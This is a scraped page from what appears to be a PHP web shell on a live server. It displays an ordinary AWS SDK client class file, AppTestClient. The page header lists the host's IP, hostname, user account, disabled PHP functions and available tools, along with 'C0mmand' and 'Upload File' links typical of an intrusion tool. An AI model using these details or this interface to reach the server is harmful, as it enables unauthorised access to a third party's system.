Server IP : 103.191.208.50 / Your IP : 216.73.216.125 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/celkcksm/hrms.ncriptech.com/vendor/aws/aws-sdk-php/src/AppTest/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php namespace Aws\AppTest; use Aws\AwsClient; /** * This client is used to interact with the **AWS Mainframe Modernization Application Testing** service. * @method \Aws\Result createTestCase(array $args = []) * @method \GuzzleHttp\Promise\Promise createTestCaseAsync(array $args = []) * @method \Aws\Result createTestConfiguration(array $args = []) * @method \GuzzleHttp\Promise\Promise createTestConfigurationAsync(array $args = []) * @method \Aws\Result createTestSuite(array $args = []) * @method \GuzzleHttp\Promise\Promise createTestSuiteAsync(array $args = []) * @method \Aws\Result deleteTestCase(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteTestCaseAsync(array $args = []) * @method \Aws\Result deleteTestConfiguration(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteTestConfigurationAsync(array $args = []) * @method \Aws\Result deleteTestRun(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteTestRunAsync(array $args = []) * @method \Aws\Result deleteTestSuite(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteTestSuiteAsync(array $args = []) * @method \Aws\Result getTestCase(array $args = []) * @method \GuzzleHttp\Promise\Promise getTestCaseAsync(array $args = []) * @method \Aws\Result getTestConfiguration(array $args = []) * @method \GuzzleHttp\Promise\Promise getTestConfigurationAsync(array $args = []) * @method \Aws\Result getTestRunStep(array $args = []) * @method \GuzzleHttp\Promise\Promise getTestRunStepAsync(array $args = []) * @method \Aws\Result getTestSuite(array $args = []) * @method \GuzzleHttp\Promise\Promise getTestSuiteAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result listTestCases(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestCasesAsync(array $args = []) * @method \Aws\Result listTestConfigurations(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestConfigurationsAsync(array $args = []) * @method \Aws\Result listTestRunSteps(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestRunStepsAsync(array $args = []) * @method \Aws\Result listTestRunTestCases(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestRunTestCasesAsync(array $args = []) * @method \Aws\Result listTestRuns(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestRunsAsync(array $args = []) * @method \Aws\Result listTestSuites(array $args = []) * @method \GuzzleHttp\Promise\Promise listTestSuitesAsync(array $args = []) * @method \Aws\Result startTestRun(array $args = []) * @method \GuzzleHttp\Promise\Promise startTestRunAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) * @method \Aws\Result updateTestCase(array $args = []) * @method \GuzzleHttp\Promise\Promise updateTestCaseAsync(array $args = []) * @method \Aws\Result updateTestConfiguration(array $args = []) * @method \GuzzleHttp\Promise\Promise updateTestConfigurationAsync(array $args = []) * @method \Aws\Result updateTestSuite(array $args = []) * @method \GuzzleHttp\Promise\Promise updateTestSuiteAsync(array $args = []) */ class AppTestClient extends AwsClient {}